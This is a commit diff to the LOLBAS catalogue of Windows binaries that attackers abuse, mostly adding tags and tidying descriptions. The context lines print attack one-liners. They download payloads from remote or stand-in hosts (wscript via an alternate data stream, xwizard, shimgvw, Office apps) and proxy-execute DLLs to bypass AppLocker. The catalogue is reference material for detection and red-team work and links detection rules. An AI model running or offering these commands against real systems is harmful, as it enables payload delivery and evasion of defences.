- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml

6
yml/OSBinaries/Tar.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows 10, Windows 11
Tags:
- Type: Compression
- Command: tar -xf compressedfilename:ads
Description: Decompress a compressed file from an alternate data stream (ADS).
Usecase: Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism
@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows 10, Windows 11
Tags:
- Type: Compression
- Command: tar -xf \\host1\archive.tar
Description: Extracts archive.tar from the remote (internal) host (host1) to the current host.
Usecase: Copy files
@ -25,6 +29,8 @@ Commands:
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Tags:
- Type: Compression
Full_Path:
- Path: C:\Windows\System32\tar.exe
- Path: C:\Windows\SysWOW64\tar.exe

6
yml/OSBinaries/Vbc.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows 7, Windows 10, Windows 11
Tags:
- Execute: WSH
- Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb
Description: Binary file used by .NET to compile Visual Basic code to an executable.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows 7, Windows 10, Windows 11
Tags:
- Execute: WSH
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
@ -28,6 +32,4 @@ Detection:
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
Acknowledgement:
- Person: Lior Adar
Handle:
- Person: Hai Vaknin(Lux)
Handle:

4
yml/OSBinaries/Wmic.yml
View File

@ -39,11 +39,11 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
Full_Path:
- Path: C:\Windows\System32\wbem\wmic.exe
- Path: C:\Windows\SysWOW64\wbem\wmic.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml

4
yml/OSBinaries/Wscript.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
- Command: echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js
Description: Download and execute script stored in an alternate data stream
Usecase: Execute hidden code to evade defensive counter measures
@ -21,8 +23,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\wscript.exe
- Path: C:\Windows\SysWOW64\wscript.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml

6
yml/OSBinaries/Wuauclt.yml
View File

@ -5,16 +5,16 @@ Author: 'David Middlehurst'
Created: 2020-09-23
Commands:
- Command: wuauclt.exe /UpdateDeploymentProvider Full_Path_To_DLL /RunHandlerComServer
Description: Full_Path_To_DLL would be the abosolute path to .DLL file and would execute code on attach.
Description: Full_Path_To_DLL would be the absolute path to .DLL file and would execute code on attach.
Usecase: Execute dll via attach/detach methods
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Windows\System32\wuauclt.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wuauclt.yml

4
yml/OSBinaries/Xwizard.yml
View File

@ -19,12 +19,14 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache.
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Windows\System32\xwizard.exe
- Path: C:\Windows\SysWOW64\xwizard.exe

4
yml/OSLibraries/Advpack.yml
View File

@ -18,6 +18,8 @@ Commands:
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11
Tags:
- Input: INF
- Command: rundll32.exe advpack.dll,RegisterOCX test.dll
Description: Launch a DLL payload by calling the RegisterOCX function.
Usecase: Load a DLL payload.
@ -25,6 +27,8 @@ Commands:
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: rundll32.exe advpack.dll,RegisterOCX calc.exe
Description: Launch an executable by calling the RegisterOCX function.
Usecase: Run an executable payload.

2
yml/OSLibraries/Ieadvpack.yml
View File

@ -25,6 +25,8 @@ Commands:
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe
Description: Launch an executable by calling the RegisterOCX function.
Usecase: Run an executable payload.

2
yml/OSLibraries/Scrobj.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path:
- Path: c:\windows\system32\scrobj.dll
- Path: c:\windows\syswow64\scrobj.dll

4
yml/OSLibraries/Setupapi.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11
Tags:
- Input: INF
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf
Description: Launch an executable file via the InstallHinfSection function and .inf file section directive.
Usecase: Load an executable payload.
@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
Tags:
- Input: INF
Full_Path:
- Path: c:\windows\system32\setupapi.dll
- Path: c:\windows\syswow64\setupapi.dll

2
yml/OSLibraries/Shell32.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe
Description: Launch an executable by calling the ShellExec_RunDLL function.
Usecase: Run an executable payload.

4
yml/OSLibraries/Shimgvw.yml
View File

@ -5,12 +5,14 @@ Author: Eral4m
Created: 2021-01-06
Commands:
- Command: rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen http://x.x.x.x/payload.exe
Description: Once executed, rundll32.exe will download the file at the URL in the command to %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\<random>\payload[1].exe. Can also be used with entrypoint 'ImageView_FullscreenA'.
Description: Once executed, rundll32.exe will download the file at the URL in the command to INetCache. Can also be used with entrypoint 'ImageView_FullscreenA'.
Usecase: Download file from remote location.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path:
- Path: c:\windows\system32\shimgvw.dll
- Path: c:\windows\syswow64\shimgvw.dll

4
yml/OSLibraries/Syssetup.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11
Tags:
- Input: INF
- Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf
Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
Usecase: Load an executable payload.
@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11
Tags:
- Input: INF
Full_Path:
- Path: c:\windows\system32\syssetup.dll
- Path: c:\windows\syswow64\syssetup.dll

2
yml/OSLibraries/Zipfldr.yml
View File

@ -21,8 +21,6 @@ Commands:
Full_Path:
- Path: c:\windows\system32\zipfldr.dll
- Path: c:\windows\syswow64\zipfldr.dll
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
Resources:

2
yml/OSScripts/CL_LoadAssembly.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1216
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
Code_Sample:

2
yml/OSScripts/UtilityFunctions.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1216
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1
Code_Sample:

4
yml/OtherMSBinaries/AccCheckConsole.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: DLL
- Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll
Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.
Usecase: Local execution of managed code to bypass AppLocker.
@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe

2
yml/OtherMSBinaries/Appvlp.yml
View File

@ -28,8 +28,6 @@ Commands:
Full_Path:
- Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe
- Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_appvlp.yml
Resources:

14
yml/OtherMSBinaries/Bginfo.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: bginfo.exe bginfo.bgi /popup /nolicprompt
Description: Execute VBscript code that is referenced within the bginfo.bgi file.
Usecase: Local execution of VBScript
@ -18,12 +20,16 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript
Description: Execute bginfo.exe from a WebDAV server.
Category: Execute
Privileges: User
MitreID: T1218
Tags:
- Execute: WSH
OperatingSystem: Windows
- Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript
@ -32,6 +38,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript
Description: This style of execution may not longer work due to patch.
@ -39,6 +47,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript
Description: This style of execution may not longer work due to patch.
@ -46,10 +56,10 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: WSH
Full_Path:
- Path: No fixed path
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml

7
yml/OtherMSBinaries/Coregen.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1055
OperatingSystem: Windows
Tags:
- Execute: DLL
- Command: coregen.exe dummy_assembly_name
Description: Loads the coreclr.dll in the corgen.exe directory (e.g. C:\Program Files\Microsoft Silverlight\5.1.50918.0).
Usecase: Execute DLL code
@ -25,6 +27,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe
- Path: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe
@ -42,8 +46,5 @@ Resources:
- Link: https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
Acknowledgement:
- Person: Nicky Tyrer
Handle:
- Person: Evan Pena
Handle:
- Person: Casey Erikson
Handle:

4
yml/OtherMSBinaries/Excel.yml
View File

@ -6,11 +6,13 @@ Created: 2019-07-19
Commands:
- Command: Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder
Usecase: It will download a remote payload and place it in INetCache.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe

4
yml/OtherMSBinaries/MsoHtmEd.yml
View File

@ -6,11 +6,13 @@ Created: 2022-07-24
Commands:
- Command: MsoHtmEd.exe https://example.com/payload
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Usecase: It will download a remote payload and place it in INetCache.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe

4
yml/OtherMSBinaries/Mspub.yml
View File

@ -6,11 +6,13 @@ Created: 2022-08-02
Commands:
- Command: mspub.exe https://example.com/payload
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Usecase: It will download a remote payload and place it in INetCache.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSPUB.exe
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSPUB.exe

4
yml/OtherMSBinaries/Powerpnt.yml
View File

@ -6,11 +6,13 @@ Created: 2019-07-19
Commands:
- Command: Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder
Usecase: It will download a remote payload and place it in INetCache.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Powerpnt.exe

8
yml/OtherMSBinaries/Procdump.yml
View File

@ -12,14 +12,18 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher
Tags:
- Execute: DLL
- Command: procdump.exe -md calc.dll foobar
Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary.
Usecase: Performs execution of unsigned DLL.
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher
Tags:
- Execute: DLL
Full_Path:
- Path: no default
Detection:

3
yml/OtherMSBinaries/Te.yml
View File

@ -18,6 +18,9 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: DLL
- Input: Custom Format
Full_Path:
- Path: no default
Detection:

4
yml/OtherMSBinaries/Tracker.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: DLL
- Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
Usecase: Injection of locally stored DLL file into target process.
@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: DLL
Full_Path:
- Path: no default
Code_Sample:

6
yml/OtherMSBinaries/Winword.yml
View File

@ -6,11 +6,13 @@ Created: 2019-07-19
Commands:
- Command: winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder
Usecase: It will download a remote payload and place it in INetCache.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Program Files\Microsoft Office\root\Office16\winword.exe
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe
@ -28,8 +30,6 @@ Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office\Office12\winword.exe
- Path: C:\Program Files\Microsoft Office\Office12\winword.exe
- Path: C:\Program Files\Microsoft Office\Office12\winword.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml
- IOC: Suspicious Office application Internet/network traffic

2
yml/OtherMSBinaries/vsls-agent.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 21H2 (likely previous and newer versions with modern versions of Visual Studio installed)
Tags:
- Execute: DLL
Full_Path:
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\Extensions\Microsoft\LiveShare\Agent\vsls-agent.exe
Detection:

2
yml/OtherMSBinaries/vstest.console.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2022\TestAgent\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe